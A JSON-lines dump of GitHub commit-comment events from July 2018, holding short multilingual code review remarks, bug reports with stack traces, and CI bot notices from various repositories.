{"id":"8003469599","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtTamari/meikaijava"},"payload":{"comment":{"id":29799338,"position":56,"line":79,"path":"e_16/src/e_16_2/e_16_2.java","commit_id":"a15f5b4a4c5798022cea3b22fec541f1465d97a7","created_at":"2018-07-23T12:04:31Z","updated_at":"2018-07-23T12:04:31Z","author_association":"COLLABORATOR","body":"たぶん下に書いてあるからっていう話もあると思うのですが、メソッドの説明はjavadoc内で統一お願いします"}},"created_at":"2018-07-23T12:04:31Z"}
{"id":"8003471828","type":"CommitCommentEvent","actor":{"login":"vanyaland"},"repo":{"name":"StepicOrg/stepik-ios"},"payload":{"comment":{"id":29799341,"position":5,"line":34,"path":"Stepic/DownloaderTask.swift","commit_id":"773e84f7c16569a1760618b73e110653fcde3e27","created_at":"2018-07-23T12:04:57Z","updated_at":"2018-07-23T12:04:57Z","author_association":"COLLABORATOR","body":"Редко такой оператор встретишь)"}},"created_at":"2018-07-23T12:04:57Z"}
{"id":"8003473906","type":"CommitCommentEvent","actor":{"login":"giletichbmk"},"repo":{"name":"giletichbmk/belarus-retail-registry"},"payload":{"comment":{"id":29799343,"position":null,"line":null,"path":null,"commit_id":"6aec4f4a30bab042ddb7c22bade5ada15f8c378e","created_at":"2018-07-23T12:05:23Z","updated_at":"2018-07-23T12:05:23Z","author_association":"OWNER","body":"complete bullshit...."}},"created_at":"2018-07-23T12:05:23Z"}
{"id":"8003474827","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29799344,"position":15,"line":21,"path":"src/DebugDrawer.java","commit_id":"372a3ef65a942f8d49b8d44e4a41a593877c3096","created_at":"2018-07-23T12:05:35Z","updated_at":"2018-07-23T12:05:35Z","author_association":"CONTRIBUTOR","body":"This is purely for debug reasons; it's not like it's going to be in the finalized product. But I can do that."}},"created_at":"2018-07-23T12:05:35Z"}
{"id":"8003475659","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"AndreyKirichenko/ror_beginner"},"payload":{"comment":{"id":29799345,"position":21,"line":21,"path":"lesson_5/instance_counter.rb","commit_id":"656255ca97ea10a3cc08d1fdbd8256319470f1cb","created_at":"2018-07-23T12:05:45Z","updated_at":"2018-07-23T12:05:45Z","author_association":"NONE","body":"В задании было сделать просто счетчик)"}},"created_at":"2018-07-23T12:05:45Z"}
{"id":"8003479319","type":"CommitCommentEvent","actor":{"login":"D-Kalashnikov"},"repo":{"name":"D-Kalashnikov/idle_master_extended"},"payload":{"comment":{"id":29799353,"position":null,"line":null,"path":null,"commit_id":"8f19e9eb03d2b829dcea43ce06fda9f7c85bbd31","created_at":"2018-07-23T12:06:29Z","updated_at":"2018-07-23T12:06:29Z","author_association":"OWNER","body":"error.log:\n\n22/07/2018 14:29:11   CookieClient -> GetHttpAsync, for url =\nhttp://steamcommunity.com/profiles/\"profilenumber\"/gamecards/503820\nSystem.Net.WebException: An exception ocurred during a WebClient Request.\n---> System.NullReferenceException: Object reference not set to an instance\nof an object.\n   at System.Net.WebClient.DownloadBitsState.SetResponse(WebResponse\nresponse)\n   at System.Net.WebClient.DownloadBitsResponseCallback(IAsyncResult result)\n   --- End of inner exception stack trace ---\n   at System.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess(Task\ntask)\n   at\nSystem.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task\ntask)\n   at IdleMaster.CookieClient.<GetHttpAsync>d__6.MoveNext()\n\n\nWhen i looking for this in foruns or something, i found it:\nhttps://github.com/jshackles/idle_master/pull/197\n\nI dont know if it fix the atual version, but is a start.\n\n2018-07-23 8:29 GMT-03:00 Jonas Nilson <notifications@github.com>:\n\n> No need to be sorry, all help is appreciated.\n>\n> Can you describe the bug in more detail? And how can I reproduce it myself?\n>\n> If you fix it you can always send a pull request here on GitHub.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/D-Kalashnikov/idle_master_extended/commit/8f19e9eb03d2b829dcea43ce06fda9f7c85bbd31#commitcomment-29798951>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnUyxxh65u8mhUCQ1cz2rPzyNJC7zycTks5uJbOPgaJpZM4Vaz0M>\n> .\n>\n"}},"created_at":"2018-07-23T12:06:29Z"}
{"id":"8003481982","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"AndreyKirichenko/ror_beginner"},"payload":{"comment":{"id":29799360,"position":22,"line":22,"path":"lesson_5/train.rb","commit_id":"656255ca97ea10a3cc08d1fdbd8256319470f1cb","created_at":"2018-07-23T12:07:06Z","updated_at":"2018-07-23T12:07:06Z","author_association":"NONE","body":"instances лучше сделать хэшем, тогда поиск будет просто выбором по ключу. Это значительно оптималней"}},"created_at":"2018-07-23T12:07:06Z"}
{"id":"8003484633","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29799365,"position":null,"line":null,"path":null,"commit_id":"ed168e9ba1d777fb4629f98df536b34b9dedd9f9","created_at":"2018-07-23T12:07:38Z","updated_at":"2018-07-23T12:07:38Z","author_association":"COLLABORATOR","body":"No. If you check the final file changes. It's gone."}},"created_at":"2018-07-23T12:07:38Z"}
{"id":"8003487339","type":"CommitCommentEvent","actor":{"login":"noomorph"},"repo":{"name":"wix/detox"},"payload":{"comment":{"id":29799371,"position":null,"line":null,"path":null,"commit_id":"a1b22ade2cbf5227a463fc6c26de4c6caca23d8b","created_at":"2018-07-23T12:08:15Z","updated_at":"2018-07-23T12:08:15Z","author_association":"CONTRIBUTOR","body":":sunglasses: nice :+1: "}},"created_at":"2018-07-23T12:08:15Z"}
{"id":"8003488294","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29799372,"position":null,"line":null,"path":null,"commit_id":"7c94caf2ef987c789e0586e3e58e19137e327839","created_at":"2018-07-23T12:08:27Z","updated_at":"2018-07-23T12:08:27Z","author_association":"COLLABORATOR","body":"Ok. I'll keep in mind."}},"created_at":"2018-07-23T12:08:27Z"}
{"id":"8003490778","type":"CommitCommentEvent","actor":{"login":"plusun"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29799380,"position":null,"line":null,"path":null,"commit_id":"b49e95e9d3692f40fc3d75ec886fb3ffe7bc09f2","created_at":"2018-07-23T12:09:00Z","updated_at":"2018-07-23T12:09:00Z","author_association":"OWNER","body":"I solved this by re-installing my llvm-symbolizer! Thanks for your hint!"}},"created_at":"2018-07-23T12:09:00Z"}
{"id":"8003493079","type":"CommitCommentEvent","actor":{"login":"overpresentme"},"repo":{"name":"overpresentme/react-native-pure-chart"},"payload":{"comment":{"id":29799387,"position":null,"line":null,"path":null,"commit_id":"4e8f0922c4c1726bac14ddf87e84526bc74a8ca2","created_at":"2018-07-23T12:09:29Z","updated_at":"2018-07-23T12:09:29Z","author_association":"OWNER","body":"solution for issue #34"}},"created_at":"2018-07-23T12:09:29Z"}
{"id":"8003497873","type":"CommitCommentEvent","actor":{"login":"Ismaili1995"},"repo":{"name":"Ismaili1995/CodeTechDevelopers"},"payload":{"comment":{"id":29799394,"position":null,"line":null,"path":null,"commit_id":"9528e8ea9fd8dca56250e51cd973be6e85c1e877","created_at":"2018-07-23T12:10:30Z","updated_at":"2018-07-23T12:10:30Z","author_association":"OWNER","body":"is a package of code for library membership registration system"}},"created_at":"2018-07-23T12:10:30Z"}
{"id":"8003502646","type":"CommitCommentEvent","actor":{"login":"DaaseAllan"},"repo":{"name":"Kroqh/Poelsemix"},"payload":{"comment":{"id":29799405,"position":null,"line":null,"path":null,"commit_id":"d431f6686a2a4322bc4806aecedf12c6b131e88f","created_at":"2018-07-23T12:11:32Z","updated_at":"2018-07-23T12:11:32Z","author_association":"COLLABORATOR","body":"Slet dette"}},"created_at":"2018-07-23T12:11:32Z"}
{"id":"8003508351","type":"CommitCommentEvent","actor":{"login":"ovovchak"},"repo":{"name":"nvipash/themoviedb-reactapp"},"payload":{"comment":{"id":29799412,"position":16,"line":16,"path":"src/containers/MovieDialog/MovieDialog.js","commit_id":"3a757c57c29cdc1ca3eb16ad16aac67f0c79ad07","created_at":"2018-07-23T12:12:44Z","updated_at":"2018-07-23T12:12:44Z","author_association":"NONE","body":"props validations is missing"}},"created_at":"2018-07-23T12:12:44Z"}
{"id":"8003508715","type":"CommitCommentEvent","actor":{"login":"roxma"},"repo":{"name":"ncm2/ncm2-tmux"},"payload":{"comment":{"id":29799414,"position":10,"line":10,"path":"autoload/ncm2_tmux.vim","commit_id":"c4e1f2507e2d164d9abee11baca9abb901f835f4","created_at":"2018-07-23T12:12:49Z","updated_at":"2018-07-23T12:12:49Z","author_association":"MEMBER","body":"@balta2ar \r\n\r\n`$TMUX` check is now removed.\r\n\r\n> What's the reasoning?\r\n\r\nThis source was created based on my  daily use.  I never need tmux completion when I'm out of tmux session."}},"created_at":"2018-07-23T12:12:49Z"}
{"id":"8003510218","type":"CommitCommentEvent","actor":{"login":"ovovchak"},"repo":{"name":"nvipash/themoviedb-reactapp"},"payload":{"comment":{"id":29799417,"position":26,"line":26,"path":"src/containers/MovieDialog/MovieDialog.js","commit_id":"3a757c57c29cdc1ca3eb16ad16aac67f0c79ad07","created_at":"2018-07-23T12:13:08Z","updated_at":"2018-07-23T12:13:08Z","author_association":"NONE","body":"I think you don't need brackets here"}},"created_at":"2018-07-23T12:13:08Z"}
{"id":"8003512887","type":"CommitCommentEvent","actor":{"login":"ovovchak"},"repo":{"name":"nvipash/themoviedb-reactapp"},"payload":{"comment":{"id":29799428,"position":38,"line":38,"path":"src/containers/MovieDialog/MovieDialog.js","commit_id":"3a757c57c29cdc1ca3eb16ad16aac67f0c79ad07","created_at":"2018-07-23T12:13:43Z","updated_at":"2018-07-23T12:13:43Z","author_association":"NONE","body":"BTW why are you using function declaration style here? why not just componentDidMount() {} ? "}},"created_at":"2018-07-23T12:13:43Z"}
{"id":"8003516143","type":"CommitCommentEvent","actor":{"login":"akshaydongaregit"},"repo":{"name":"akshaydongaregit/HelloWorld"},"payload":{"comment":{"id":29799435,"position":null,"line":null,"path":null,"commit_id":"1d8703aa8d59b349667d525caa6d4a05cc9e750b","created_at":"2018-07-23T12:14:27Z","updated_at":"2018-07-23T12:14:27Z","author_association":"OWNER","body":"Spring MVC Demo -- Trainee Managment Application\r\n"}},"created_at":"2018-07-23T12:14:27Z"}
{"id":"8003516849","type":"CommitCommentEvent","actor":{"login":"ovovchak"},"repo":{"name":"nvipash/themoviedb-reactapp"},"payload":{"comment":{"id":29799438,"position":104,"line":88,"path":"src/containers/SearchMovie/SearchMovie.js","commit_id":"3a757c57c29cdc1ca3eb16ad16aac67f0c79ad07","created_at":"2018-07-23T12:14:36Z","updated_at":"2018-07-23T12:14:36Z","author_association":"NONE","body":"handler methods should start from 'on' prefix"}},"created_at":"2018-07-23T12:14:36Z"}
{"id":"8003518961","type":"CommitCommentEvent","actor":{"login":"dilrajssokhi"},"repo":{"name":"harshita009/login_and_reg"},"payload":{"comment":{"id":29799443,"position":29,"line":24,"path":"login_user.js","commit_id":"9303372c84361da645b3b3dee66173d7ac2072b0","created_at":"2018-07-23T12:15:05Z","updated_at":"2018-07-23T12:15:05Z","author_association":"NONE","body":"See how you are adding the connection.query statements inside another connection.query statement. This can easily turn into callback hell (google it) if additional requirements are added in your login/registeration flow. \r\nLook into asyc.auto or async.series to get rid of this problem. Async functions can help you achieve code free from callback hell while async await or yield can help you in maintaining synchronous code structure (as we discussed in the morning)"}},"created_at":"2018-07-23T12:15:05Z"}
{"id":"8003521705","type":"CommitCommentEvent","actor":{"login":"brendanmurty"},"repo":{"name":"brendanmurty/murty.io"},"payload":{"comment":{"id":29799447,"position":null,"line":null,"path":null,"commit_id":"6520e1862850634bebbfebceb141e6fc5cadc04a","created_at":"2018-07-23T12:15:41Z","updated_at":"2018-07-23T12:15:41Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add \"Stan\" (Stn) icon to New Tab Extension](https://trello.com/c/7yrO0DG8/263-add-stan-stn-icon-to-new-tab-extension)"}},"created_at":"2018-07-23T12:15:41Z"}
{"id":"8003526089","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29799459,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-23T12:16:38Z","updated_at":"2018-07-23T12:16:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T12:16:38Z"}
{"id":"8003526609","type":"CommitCommentEvent","actor":{"login":"FrancescoXX"},"repo":{"name":"yeanqi/hello-world"},"payload":{"comment":{"id":29799460,"position":null,"line":null,"path":null,"commit_id":"a6b9038e590c14a5d5f3b7e6602dc25bf72dc02b","created_at":"2018-07-23T12:16:45Z","updated_at":"2018-07-23T12:16:45Z","author_association":"NONE","body":"Hello!, if you need any help you can contact me at francescociullaroma@gmail.com. Bye Francesco"}},"created_at":"2018-07-23T12:16:45Z"}
{"id":"8003528633","type":"CommitCommentEvent","actor":{"login":"dilrajssokhi"},"repo":{"name":"harshita009/login_and_reg"},"payload":{"comment":{"id":29799481,"position":6,"line":6,"path":"secured_api.js","commit_id":"9303372c84361da645b3b3dee66173d7ac2072b0","created_at":"2018-07-23T12:17:11Z","updated_at":"2018-07-23T12:17:11Z","author_association":"NONE","body":"All these static messages should be defined separately in a constants file where you can easily change these messages throughtout the code. Also look in Boom npm module and see how it standardizes the error messages for REST api's and then try to add it in your project."}},"created_at":"2018-07-23T12:17:11Z"}
{"id":"8003537124","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"DDT-Kibe/meikai_java2018_04"},"payload":{"comment":{"id":29799496,"position":42,"line":27,"path":"meikai_java2018_05/src/e_03/e_03_03.java","commit_id":"386948037f818520a3aa944c4d1391836f8e3706","created_at":"2018-07-23T12:18:58Z","updated_at":"2018-07-23T12:18:58Z","author_association":"COLLABORATOR","body":"else ifの書き方に関して変な癖がつくといけないので修正させてください\r\n\r\nif {\r\n\r\n} else if {\r\n\r\n} else {\r\n\r\n}\r\n\r\nと書くのが正しいです\r\n\r\n佐藤"}},"created_at":"2018-07-23T12:18:58Z"}
{"id":"8003540115","type":"CommitCommentEvent","actor":{"login":"misha-pelykh"},"repo":{"name":"DeniSerb/my_server"},"payload":{"comment":{"id":29799503,"position":3,"line":1,"path":"usercache.json","commit_id":"a60433261490573417cf3face8382542920108da","created_at":"2018-07-23T12:19:37Z","updated_at":"2018-07-23T12:19:37Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-23T12:19:37Z"}
{"id":"8003543998","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"ODudek/popularity-of-javascript-frameworks"},"payload":{"comment":{"id":29799513,"position":32,"line":43,"path":"src/vendors/chart/setup-chart.js","commit_id":"501d1d6c69ffe2ef68489eb66a8555e6810d6969","created_at":"2018-07-23T12:20:25Z","updated_at":"2018-07-23T12:20:25Z","author_association":"NONE","body":"Dlaczego ignorujesz zwracają wartość funkcji `countPercentages`?"}},"created_at":"2018-07-23T12:20:25Z"}
{"id":"8003544083","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"DDT-Kibe/meikai_java2018_04"},"payload":{"comment":{"id":29799514,"position":53,"line":38,"path":"meikai_java2018_05/src/e_03/e_03_03.java","commit_id":"386948037f818520a3aa944c4d1391836f8e3706","created_at":"2018-07-23T12:20:26Z","updated_at":"2018-07-23T12:20:26Z","author_association":"COLLABORATOR","body":"条件はelseという条件があるので減ってるわけではないですね。\r\n考察してほしい内容としてはelse の条件としてelse ifでどこまですくいきれるか、プログラムを書く上でどういう違いが出てくるか、という部分です。ご検討お願いします。\r\n\r\n佐藤"}},"created_at":"2018-07-23T12:20:26Z"}
{"id":"8003547304","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29799524,"position":null,"line":null,"path":null,"commit_id":"da4390585999fc9a4aa20201af05d2a412161682","created_at":"2018-07-23T12:21:08Z","updated_at":"2018-07-23T12:21:08Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-99](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-99).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-99-next50.pantheonsite.io/)"}},"created_at":"2018-07-23T12:21:08Z"}
{"id":"8003549428","type":"CommitCommentEvent","actor":{"login":"dilrajssokhi"},"repo":{"name":"harshita009/login_and_reg"},"payload":{"comment":{"id":29799529,"position":29,"line":24,"path":"login_user.js","commit_id":"9303372c84361da645b3b3dee66173d7ac2072b0","created_at":"2018-07-23T12:21:35Z","updated_at":"2018-07-23T12:21:35Z","author_association":"NONE","body":"Yes, token will only be saved on the frontend so that they can keep authenticating the user for accessing backend APIs. Session based authentication is when you maintain sessions in the db along with session details. "}},"created_at":"2018-07-23T12:21:35Z"}
{"id":"8003550214","type":"CommitCommentEvent","actor":{"login":"dilrajssokhi"},"repo":{"name":"harshita009/login_and_reg"},"payload":{"comment":{"id":29799530,"position":29,"line":24,"path":"login_user.js","commit_id":"9303372c84361da645b3b3dee66173d7ac2072b0","created_at":"2018-07-23T12:21:45Z","updated_at":"2018-07-23T12:21:45Z","author_association":"NONE","body":"See how you are adding the connection.query statements inside another connection.query statement. This can easily turn into callback hell (google it) if additional requirements are added in your login/registeration flow.\r\n\r\nLook into asyc.auto or async.series to get rid of this problem. Async functions can help you achieve code free from callback hell while async await or yield can help you in maintaining synchronous code structure (as we discussed in the morning)"}},"created_at":"2018-07-23T12:21:45Z"}
{"id":"8003557798","type":"CommitCommentEvent","actor":{"login":"annoviko"},"repo":{"name":"kwonoh/pyclustering"},"payload":{"comment":{"id":29799545,"position":null,"line":null,"path":null,"commit_id":"69209e546a78a22fb01236e0d91a532dcbddc002","created_at":"2018-07-23T12:23:18Z","updated_at":"2018-07-23T12:23:18Z","author_association":"NONE","body":"Hello, @kwonoh ,\r\n\r\nI've seen you have forked pyclustering and introduce intel library tbb. Does this optimization help to increase performance? Have you got experimental results or comparison between 'before tbb' and 'after tbb' for this particular algorithm?"}},"created_at":"2018-07-23T12:23:18Z"}
{"id":"8003561578","type":"CommitCommentEvent","actor":{"login":"dilrajssokhi"},"repo":{"name":"harshita009/login_and_reg"},"payload":{"comment":{"id":29799552,"position":8,"line":5,"path":"verify_token.js","commit_id":"9303372c84361da645b3b3dee66173d7ac2072b0","created_at":"2018-07-23T12:24:08Z","updated_at":"2018-07-23T12:24:08Z","author_association":"NONE","body":"Please change this authentication (as discussed last friday) where the user details will be retrieved by decoding the access token rather than matching the access tokens saved in the database."}},"created_at":"2018-07-23T12:24:08Z"}
{"id":"8003562255","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29799555,"position":null,"line":null,"path":null,"commit_id":"8735019c4b54f99b6e54e3ef8f27ecacbc835067","created_at":"2018-07-23T12:24:17Z","updated_at":"2018-07-23T12:24:17Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-305](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-305).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-305-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-23T12:24:17Z"}
{"id":"8003563753","type":"CommitCommentEvent","actor":{"login":"abo-abo"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":29799557,"position":null,"line":null,"path":null,"commit_id":"d1d567ac6fb70b88342d9db4db2b2d4f89c10e29","created_at":"2018-07-23T12:24:37Z","updated_at":"2018-07-23T12:24:37Z","author_association":"OWNER","body":"> Could there be something in your configuration giving rise to the warning?\r\n\r\nYes, it's something in my config. I can't reproduce with `emacs -Q`. I'll bisect it when I get some time. It's not a priority though)\r\n"}},"created_at":"2018-07-23T12:24:37Z"}
{"id":"8003589259","type":"CommitCommentEvent","actor":{"login":"mckaygerhard"},"repo":{"name":"cat-in-136/FlatSurfacesTheme"},"payload":{"comment":{"id":29799588,"position":null,"line":null,"path":null,"commit_id":"47f8f383727e9dd788f1f1cbae44306c159656c9","created_at":"2018-07-23T12:29:59Z","updated_at":"2018-07-23T12:29:59Z","author_association":"NONE","body":"thanks! minimal distros will now see what must be install"}},"created_at":"2018-07-23T12:29:59Z"}
{"id":"8003601918","type":"CommitCommentEvent","actor":{"login":"lat9"},"repo":{"name":"zencart/zencart"},"payload":{"comment":{"id":29799607,"position":null,"line":null,"path":null,"commit_id":"b970f7ad34a429bfc0e399a5cfb00a8833323603","created_at":"2018-07-23T12:32:37Z","updated_at":"2018-07-23T12:32:37Z","author_association":"CONTRIBUTOR","body":"Shouldn't the `NOTIFY_FEATURED_PRODUCTS_SQL_STRING` notification include the `$featured_products_query_raw` as an updateable parameter, i.e.\r\n\r\n```\r\n$zco_notifier->notify('NOTIFY_FEATURED_PRODUCTS_SQL_STRING', array(), $featured_products_query_raw);\r\n```"}},"created_at":"2018-07-23T12:32:37Z"}
{"id":"8003602126","type":"CommitCommentEvent","actor":{"login":"syuukaxiaoy"},"repo":{"name":"syuukaxiaoy/abtest_project"},"payload":{"comment":{"id":29799608,"position":null,"line":null,"path":null,"commit_id":"7809fcc27deac5b5fc9dd0f5208c8f7c2dd2c62d","created_at":"2018-07-23T12:32:40Z","updated_at":"2018-07-23T12:32:40Z","author_association":"OWNER","body":"docs：修改 README 文档。"}},"created_at":"2018-07-23T12:32:40Z"}
{"id":"8003604620","type":"CommitCommentEvent","actor":{"login":"LukasPaczos"},"repo":{"name":"mapbox/mapbox-gl-native"},"payload":{"comment":{"id":29799618,"position":21,"line":146,"path":"platform/android/MapboxGLAndroidSDK/src/main/java/com/mapbox/mapboxsdk/Mapbox.java","commit_id":"45b60690f314c2ca6eb93174ad0ef9a3911cee98","created_at":"2018-07-23T12:33:12Z","updated_at":"2018-07-23T12:33:12Z","author_association":"MEMBER","body":"Much more readable! :rocket: "}},"created_at":"2018-07-23T12:33:12Z"}
{"id":"8003605174","type":"CommitCommentEvent","actor":{"login":"georgehazan"},"repo":{"name":"miranda-ng/miranda-ng"},"payload":{"comment":{"id":29799620,"position":null,"line":null,"path":null,"commit_id":"12390287f9518ed86855a03811f17bac18247bc2","created_at":"2018-07-23T12:33:19Z","updated_at":"2018-07-23T12:33:19Z","author_association":"MEMBER","body":"shall fix #1513"}},"created_at":"2018-07-23T12:33:19Z"}
{"id":"8003615655","type":"CommitCommentEvent","actor":{"login":"filipekiss"},"repo":{"name":"filipekiss/zdotdir"},"payload":{"comment":{"id":29799633,"position":null,"line":null,"path":null,"commit_id":"e5841f91803b43aa6dd7291de778332d7cc38e06","created_at":"2018-07-23T12:35:30Z","updated_at":"2018-07-23T12:35:30Z","author_association":"OWNER","body":"I totally  misread your first comment, sorry!\r\n\r\nAre you using the same regex I am or are you using the one in [this blog post](http://www.math.cmu.edu/~gautam/sj/blog/20140625-zsh-expand-alias.html)? If I use the one in the post, it won't work for me (although it won't print any errors)."}},"created_at":"2018-07-23T12:35:30Z"}
{"id":"8003619889","type":"CommitCommentEvent","actor":{"login":"coco900123"},"repo":{"name":"MJavad/electra-plrun"},"payload":{"comment":{"id":29799643,"position":null,"line":null,"path":null,"commit_id":"b31966c4fb1307fd6e152720a6aa62216719eed2","created_at":"2018-07-23T12:36:17Z","updated_at":"2018-07-23T12:36:17Z","author_association":"NONE","body":"still got the error \r\nbfinject: line 242: ./plrun: cannot execute binary file: Operation not permitted\r\nios 11.3.1 i6s+ "}},"created_at":"2018-07-23T12:36:17Z"}
{"id":"8003623054","type":"CommitCommentEvent","actor":{"login":"pintomax"},"repo":{"name":"foglamp/FogLAMP"},"payload":{"comment":{"id":29799648,"position":1,"line":1,"path":"scripts/plugins/storage/postgres/upgrade/3.sql","commit_id":"c93d58a93fa45e41a30e0f714795af86586af3e9","created_at":"2018-07-23T12:36:54Z","updated_at":"2018-07-23T12:36:54Z","author_association":"CONTRIBUTOR","body":"Please add foglamp.configuration, otherwise you'll see an error"}},"created_at":"2018-07-23T12:36:54Z"}
{"id":"8003623307","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29799650,"position":null,"line":null,"path":null,"commit_id":"cbf271e1340f301ead4b228c10848fba0e45afbe","created_at":"2018-07-23T12:36:57Z","updated_at":"2018-07-23T12:36:57Z","author_association":"COLLABORATOR","body":"This looks good! Please try to document each bug with a similar log. It will be also useful in future for reports, EuroBSDCon etc. And more convenient for me to have a quick look without reloading local setup."}},"created_at":"2018-07-23T12:36:57Z"}
{"id":"8003625231","type":"CommitCommentEvent","actor":{"login":"azasypkin"},"repo":{"name":"elastic/kibana"},"payload":{"comment":{"id":29799654,"position":5,"line":164,"path":"CONTRIBUTING.md","commit_id":"29c3f374351c3b4e3d534919954801efab26bf5e","created_at":"2018-07-23T12:37:19Z","updated_at":"2018-07-23T12:37:19Z","author_association":"MEMBER","body":"__typo:__ `engine` ---> `engines` :)"}},"created_at":"2018-07-23T12:37:19Z"}
{"id":"8003629304","type":"CommitCommentEvent","actor":{"login":"ahmedelgabri"},"repo":{"name":"filipekiss/zdotdir"},"payload":{"comment":{"id":29799660,"position":null,"line":null,"path":null,"commit_id":"e5841f91803b43aa6dd7291de778332d7cc38e06","created_at":"2018-07-23T12:38:07Z","updated_at":"2018-07-23T12:38:07Z","author_association":"NONE","body":"I tested with yours & another one not from the blog though (can't remember where) both gave the same error"}},"created_at":"2018-07-23T12:38:07Z"}
{"id":"8003634593","type":"CommitCommentEvent","actor":{"login":"AlexanderAmelkin"},"repo":{"name":"ipmitool/ipmitool"},"payload":{"comment":{"id":29799664,"position":4,"line":33,"path":"lib/helper.c","commit_id":"eb5c73c04e0e720cc6a763725796841aa079a8af","created_at":"2018-07-23T12:39:03Z","updated_at":"2018-07-23T12:39:03Z","author_association":"CONTRIBUTOR","body":"@zstyblik, can you please explain what you meant here? I can't parse this `#define` in my mind. Did you mean `#ifdef` or did you forget the macro name that you wanted to define here?\r\nAs far as I understand, the intention was to enable some feature test macros to expose additional prototypes and get rid of 'implicit declaration' warnings. However, to my understanding this particular line only defines `_BSD_SOURCE` and for no apparent reason sets it to `|| _DEFAULT_SOURCE || _XOPEN_SOURCE >= 500 || ...`. Could you please clarify?"}},"created_at":"2018-07-23T12:39:03Z"}
{"id":"8003644478","type":"CommitCommentEvent","actor":{"login":"wlandau"},"repo":{"name":"ropensci/drake"},"payload":{"comment":{"id":29799683,"position":null,"line":null,"path":null,"commit_id":"6e3ee5adc43fc894738707e40c06baeb88665023","created_at":"2018-07-23T12:40:54Z","updated_at":"2018-07-23T12:40:54Z","author_association":"COLLABORATOR","body":"That sounds like what `drake` was doing from e36f246146cf63c4aa132460c1b44f0a0662192f to de5835f3135e700c65bdf61862303a5236ec7adc, and I do remember seeing overhead for small projects. I believe @kendonB may have been involved in this discussion too."}},"created_at":"2018-07-23T12:40:54Z"}
{"id":"8003646779","type":"CommitCommentEvent","actor":{"login":"mattman578"},"repo":{"name":"mattman578/puppetlabs-postgresql"},"payload":{"comment":{"id":29799684,"position":null,"line":null,"path":null,"commit_id":"27a48138c9c2d6d3727f9dda7a25e2ffd15d9d4e","created_at":"2018-07-23T12:41:23Z","updated_at":"2018-07-23T12:41:23Z","author_association":"OWNER","body":"Error: Could not parse for environment production: Syntax error at 'Hash'; expected ')' puppetlabs-postgresql/manifests/server.pp:59\r\n"}},"created_at":"2018-07-23T12:41:23Z"}
{"id":"8003646845","type":"CommitCommentEvent","actor":{"login":"basil-conto"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":29799685,"position":null,"line":null,"path":null,"commit_id":"d1d567ac6fb70b88342d9db4db2b2d4f89c10e29","created_at":"2018-07-23T12:41:23Z","updated_at":"2018-07-23T12:41:23Z","author_association":"CONTRIBUTOR","body":"Sure, let me know whenever you figure it out."}},"created_at":"2018-07-23T12:41:23Z"}
{"id":"8003647267","type":"CommitCommentEvent","actor":{"login":"pintomax"},"repo":{"name":"foglamp/FogLAMP"},"payload":{"comment":{"id":29799687,"position":1,"line":1,"path":"scripts/plugins/storage/postgres/downgrade/2.sql","commit_id":"c93d58a93fa45e41a30e0f714795af86586af3e9","created_at":"2018-07-23T12:41:28Z","updated_at":"2018-07-23T12:41:28Z","author_association":"CONTRIBUTOR","body":"Please add foglamp.configuration, otherwise you'll see an error"}},"created_at":"2018-07-23T12:41:28Z"}
